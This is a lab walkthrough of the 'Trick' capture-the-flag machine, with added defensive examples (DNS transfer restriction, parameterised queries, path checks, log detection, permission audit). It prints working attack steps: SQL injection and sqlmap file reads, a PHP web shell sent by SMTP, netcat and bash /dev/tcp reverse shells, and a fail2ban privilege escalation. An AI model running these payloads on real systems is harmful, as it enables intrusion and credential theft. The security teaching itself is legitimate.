Trick

External Enumeration

Nmap

nmap -sC -sV -T4 10.129.227.180

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo nmap -A -sU --top-ports 100 10.129.227.180

53/udp   open          domain   ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
68/udp   open|filtered dhcpc
177/udp  open|filtered xdmcp
631/udp  open|filtered ipp
5353/udp open|filtered zeroconf

SSH (22)

Attempting Anonymous Login - No Results

ssh anonymous@10.129.227.180

HTTP (80)

  • Basic website, not set up
  • Checking for VHosts and directories

Vhost Enumeration - No Results

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.227.180 -H 'Host: FUZZ.10.129.227.180' -fs 5480

Directory Enumeration - No Results

ffuf -u http://10.129.227.180/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

css                  [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 32ms]
js                   [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 33ms]
assets               [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 32ms]

DNS

dig axfr @10.129.227.180 trick.htb

; <<>> DiG 9.18.41-1~deb12u1-Debian <<>> axfr @10.129.227.180 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 26 msec
;; SERVER: 10.129.227.180#53(10.129.227.180) (TCP)
;; WHEN: Sat Jan 10 15:26:37 EST 2026
;; XFR size: 6 records (messages 1, bytes 231)
  • Shows subdomain of preprod-payroll.trick.htb
  • add preprod-payroll.trick.htb to /etc/hosts
  • Visiting preprod-payroll.trick.htb displays an employee payroll website with a username and password field
  • Trying basic SQL injection on the login form: admin' 1=1-- - allows us entry
  • Find Username Enemigoss
  • Find Employee John C. Smith in the IT Department
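The zone transfer above succeeded because the server answers AXFR for any client, which is the BIND 9.11 default. The following named.conf fragment is an added example, not the writeup's or the target's real configuration; the zone file path and the secondary address 10.0.0.53 are placeholders. It shows the permissive setting beside the restricted one.

```conf
// Added example, not the writeup's or the target's actual named.conf.
// Zone file path and the secondary address 10.0.0.53 are placeholders.

// Weak: with no allow-transfer statement BIND 9.11 behaves as if "any" were
// set, which is what "dig axfr @10.129.227.180 trick.htb" above relied on.
zone "trick.htb" {
    type master;
    file "/etc/bind/db.trick.htb";
    allow-transfer { any; };
};

// Hardened (use instead of the block above): only the named secondaries may
// pull the zone; every other client gets "; Transfer failed." from dig.
acl "secondaries" { 10.0.0.53; };
zone "trick.htb" {
    type master;
    file "/etc/bind/db.trick.htb";
    allow-transfer { secondaries; };
};
```

After editing, run named-checkconf, reload, and repeat the dig axfr command: the expected result is "; Transfer failed." rather than the record list above, and the preprod-payroll CNAME is no longer discoverable this way.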

SQL Map

  • Capturing Login Request via burp
  • Right-click and save as file login.req
sqlmap -r login.req --level=5 --risk=3 --threads=10 --random-agent --technique=BEU

Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=admin' OR NOT 7452=7452-- lljn&password=admin

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=admin' OR (SELECT 9363 FROM(SELECT COUNT(*),CONCAT(0x716b787071,(SELECT (ELT(9363=9363,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yPAC&password=admin
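The manual login bypass and sqlmap's boolean-based probe exploit the same defect: the username is spliced into the SQL string. The Python below is an added example, not code from the writeup or from the payroll application; it uses an in-memory SQLite table with a constructed row as a stand-in for payroll_db.users and shows the concatenated query beside its parameterised replacement.

```python
# Added example, not from the writeup or the target application.
# Constructed SQLite stand-in for payroll_db.users.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, name TEXT)")
    # Constructed sample row. A real application stores a password hash, not the
    # plaintext that the dump further down revealed.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("payroll_admin", "correct horse battery staple", "Administrator"))
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    # String concatenation: quotes and the "--" comment marker in the input
    # become part of the SQL grammar instead of staying data.
    return (f"SELECT name FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    try:
        row = conn.execute(build_vulnerable_query(username, password)).fetchone()
        return row is not None
    except sqlite3.Error:
        # A malformed injection (syntax error) simply fails the login.
        return False


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the driver passes the values separately from the query
    # text, so a quote or "--" in the input can never change the statement.
    row = conn.execute(
        "SELECT name FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def run_demo() -> dict:
    conn = make_db()
    bypass = "admin' OR 1=1-- -"                    # tautology: every row matches
    probe_false = "admin' OR NOT 7452=7452-- lljn"  # sqlmap's probe, false branch
    return {
        "vulnerable_bypass": vulnerable_login(conn, bypass, "anything"),
        "vulnerable_probe_false": vulnerable_login(conn, probe_false, "anything"),
        "safe_bypass": safe_login(conn, bypass, "anything"),
        "safe_real_creds": safe_login(conn, "payroll_admin", "correct horse battery staple"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query("admin' OR 1=1-- -", "x"))
    print(run_demo())
```

The probe line shows why sqlmap could enumerate the database blind: the true and false variants of an injected comparison produce different login outcomes, which is exactly the difference the tool measures. With bound parameters both variants are just an unknown username and the outcome is identical.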

sqlmap -r login.req --batch --dump

Database: payroll_db
Table: users
[1 entry]

Name          | Password              | Username
Administrator | SuperGucciRainbowCake | Enemigoss
  • Find password for Enemigoss User
sqlmap -r login.req --privileges

database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE
  • Find Username remo
  • With the FILE privilege we can read arbitrary files from the server through the injection
  • Important Files include /etc/passwd and the nginx config /etc/nginx/sites-enabled/default
sqlmap -r login.req --file-read=/etc/passwd

cat /home/parrot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd

michael:x:1001:1001::/home/michael:/bin/bash
  • Find User Michael exists on the machine

sqlmap -r login.req --file-read=/etc/nginx/sites-enabled/default

cat /home/parrot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_nginx_sites-enabled_default

server_name preprod-marketing.trick.htb;
  • Find Vhost preprod-marketing.trick.htb
  • add to /etc/hosts

Enumerating preprod-marketing.trick.htb

  • Able to find LFI Vulnerability
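The payload used against preprod-marketing further down (`....//....//`) is the standard bypass for an include routine that strips `../` once and then trusts the result. The Python below is an added example, not code from the writeup or from the target site; it builds a small constructed web root in a temporary directory, reproduces the filter-then-include pattern, and shows the resolve-and-check approach that does not have this problem.

```python
# Added example, not from the writeup or the target site. The "pages"
# directory and its contents are constructed in a temporary directory.
import tempfile
from pathlib import Path
from typing import Optional


def naive_sanitise(page: str) -> str:
    # A single, non-recursive removal of "../". Given "....//", the middle
    # "../" is removed and the leftover characters re-join into "../" again.
    return page.replace("../", "")


def make_webroot() -> Path:
    root = Path(tempfile.mkdtemp())
    (root / "pages").mkdir()
    (root / "pages" / "home.html").write_text("<h1>home</h1>")
    # Constructed file standing in for anything outside the include directory.
    (root / "secret.txt").write_text("outside the pages directory")
    return root


def vulnerable_include(webroot: Path, page: str) -> str:
    # Filter-then-include: the pattern that the "....//" payload defeats.
    return (webroot / "pages" / naive_sanitise(page)).read_text()


def resolve_page(webroot: Path, page: str) -> Optional[Path]:
    # Hardened: canonicalise the joined path and insist that the real path is
    # still under the include directory. Absolute inputs, "..", "....//" and
    # symlinks pointing elsewhere all fail the check instead of being "cleaned".
    base = (webroot / "pages").resolve()
    candidate = (base / page).resolve()
    if candidate != base and base not in candidate.parents:
        return None
    if not candidate.is_file():
        return None
    return candidate


def safe_include(webroot: Path, page: str) -> Optional[str]:
    target = resolve_page(webroot, page)
    return target.read_text() if target else None


if __name__ == "__main__":
    root = make_webroot()
    print(naive_sanitise("....//....//secret.txt"))      # ../../secret.txt
    print(vulnerable_include(root, "....//secret.txt"))  # leaks the file
    print(safe_include(root, "....//secret.txt"))        # None
    print(safe_include(root, "home.html"))               # <h1>home</h1>
```

Rejecting rather than rewriting is the point: any cleanup step that runs once can be fed input that becomes dangerous only after that step, whereas a containment check on the resolved path has nothing to bypass. A fixed allowlist of page names is stricter still and is the usual choice when the set of includable pages is small.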

SMTP (25)

  • Try to send Michael an email with PHP code. It will appear in /var/mail/michael
nc trick.htb 25
mail from: tyler
rcpt to: michael
data
<?php system($_GET['cmd']);?>
.
  • Run NC from webserver
/var/mail/michael&cmd=

nc 10.10.14.128 5555 -e /bin/sh
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//var/mail/michael&cmd=nc%2010.10.14.128%205555%20-e%20/bin/sh
  • Receiving shell as Michael
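The request that delivered the shell leaves a distinctive trace in the nginx access log: a `page` parameter containing dot-dot segments and a path into the mail spool. The Python below is an added detection example, not code from the writeup; the three log lines are constructed in nginx combined format to resemble that traffic (one benign request, one with the `....//` padding, one URL-encoded), and the function flags the parameter values that carry traversal or sensitive-path indicators after decoding.

```python
# Added example, not from the writeup. The access-log lines are constructed in
# nginx "combined" format to resemble the preprod-marketing traffic above.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic.
SAMPLE_LOG = """\
10.10.14.128 - - [12/Jan/2026:01:22:10 +0000] "GET /index.php?page=home.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.128 - - [12/Jan/2026:01:22:11 +0000] "GET /index.php?page=....//....//....//var/mail/michael&cmd=id HTTP/1.1" 200 88 "-" "curl/7.88.1"
10.10.14.128 - - [12/Jan/2026:01:22:12 +0000] "GET /index.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1650 "-" "curl/7.88.1"
"""

# "....//" still contains a literal "../" once you look at the characters, so a
# plain dot-dot match catches the padded form as well as the ordinary one.
TRAVERSAL = re.compile(r"\.\.[/\\]")
SENSITIVE = re.compile(r"/(etc/passwd|var/mail/|proc/self/)", re.I)


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    # Undo layered percent-encoding (%252e%252e%252f and similar) up to `rounds` times.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_traversal(log_text: str) -> list:
    # Returns (client_ip, parameter_name, decoded_value, reasons) per suspicious parameter.
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_repeatedly(raw)
            reasons = []
            if TRAVERSAL.search(value):
                reasons.append("dot-dot segment")
            if SENSITIVE.search(value):
                reasons.append("sensitive path")
            if reasons:
                findings.append((m.group("ip"), name, value, reasons))
    return findings


if __name__ == "__main__":
    for finding in flag_traversal(SAMPLE_LOG):
        print(finding)
```

Pair this with the mail log: a message accepted for a local user followed within minutes by a request whose `page` value ends in `/var/mail/<that user>` is the sequence used here, and the two events together are a much stronger signal than either alone.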

Enumerating Michael

cd /home/michael
michael@trick:~$ cat user.txt
7dc0886218e1e198a8410d6585403113
  • Finding SSH key for Michael
cat << 'EOF' > id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
EOF
chmod 600 id_rsa
ssh michael@10.129.59.222 -i id_rsa

Checking Permissions for Michael

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
michael@trick:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Privilege Escalation

cat /etc/init.d/fail2ban
  • Goal: edit the Fail2Ban ban action so that when a user is banned we receive an elevated shell
  • Checking Fail2Ban, the ban action is run from iptables-multiport.conf; update the actionban directive
  • We do not have write access to the file itself, but since it sits in a directory writable by the security group we are able to move (rename) files there
mv iptables-multiport.conf .config
cp .config iptables-multiport.conf
ls -la

-rw-r--r-- 1 michael michael   1420 Jan 12 01:22 iptables-multiport.conf
#Now we have ownership of the file
  • update iptables-multiport.conf
actionban = /tmp/shell.sh
  • Create shell.sh in /tmp
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/4444 0>&1' > /tmp/shell.sh
  • Restart the Fail2Ban service so the modified action is loaded
  • Start listener
nc -nvlp 4444
  • Get Michael banned by logging in with incorrect credentials
ssh michael@trick.htb
cd root
cat root.txt
eb02daa527b94e5e7e6459640c924211
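The root cause of the escalation is not the sudo rule alone but its combination with a group-writable fail2ban action directory: a file michael cannot edit can still be renamed and replaced, and the root-run service then executes whatever the replacement says. The Python below is an added example, not code from the writeup; it builds a constructed stand-in for /etc/fail2ban in a temporary directory, with action.d group-writable the way the box had it, and runs a small permission audit of the kind a defender would point at any directory a root-privileged service reads commands from.

```python
# Added example, not from the writeup. The directory tree is a constructed
# stand-in for /etc/fail2ban, created in a temporary directory.
import os
import stat
import tempfile
from pathlib import Path


def build_demo_tree() -> Path:
    root = Path(tempfile.mkdtemp())
    (root / "action.d").mkdir()
    (root / "action.d" / "iptables-multiport.conf").write_text(
        "[Definition]\nactionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>\n"
    )
    (root / "jail.conf").write_text("[DEFAULT]\n")
    # The flaw on the box: the directory is writable by a non-root group, so its
    # entries can be renamed and re-created even though the file itself is 0644.
    os.chmod(root / "action.d", 0o775)
    os.chmod(root / "action.d" / "iptables-multiport.conf", 0o644)
    os.chmod(root / "jail.conf", 0o644)
    return root


def audit_writable(root: Path) -> list:
    # Returns (relative_path, reason) for every entry that a group or the world
    # can write. Mode bits are checked directly rather than via os.access(), so
    # the result does not depend on who runs the audit.
    findings = []
    for path in [root, *sorted(root.rglob("*"))]:
        mode = path.lstat().st_mode
        reasons = []
        if mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons and stat.S_ISDIR(mode):
            reasons.append("entries can be renamed/replaced")
        if reasons:
            findings.append((str(path.relative_to(root)), ", ".join(reasons)))
    return findings


def remediate(root: Path) -> list:
    # Apply the fix to the demo tree: directories 0755, files 0644, and return
    # the audit result afterwards (expected to be empty).
    for path in [root, *root.rglob("*")]:
        os.chmod(path, 0o755 if path.is_dir() else 0o644)
    return audit_writable(root)


if __name__ == "__main__":
    tree = build_demo_tree()
    print(audit_writable(tree))  # [('action.d', 'group-writable, entries can be renamed/replaced')]
    print(remediate(tree))       # []
```

On a real host the chown to root:root matters as much as the mode bits, and the sudo rule deserves the same scrutiny: any NOPASSWD entry that restarts a service is effectively a grant of whatever that service reads from files the user can influence.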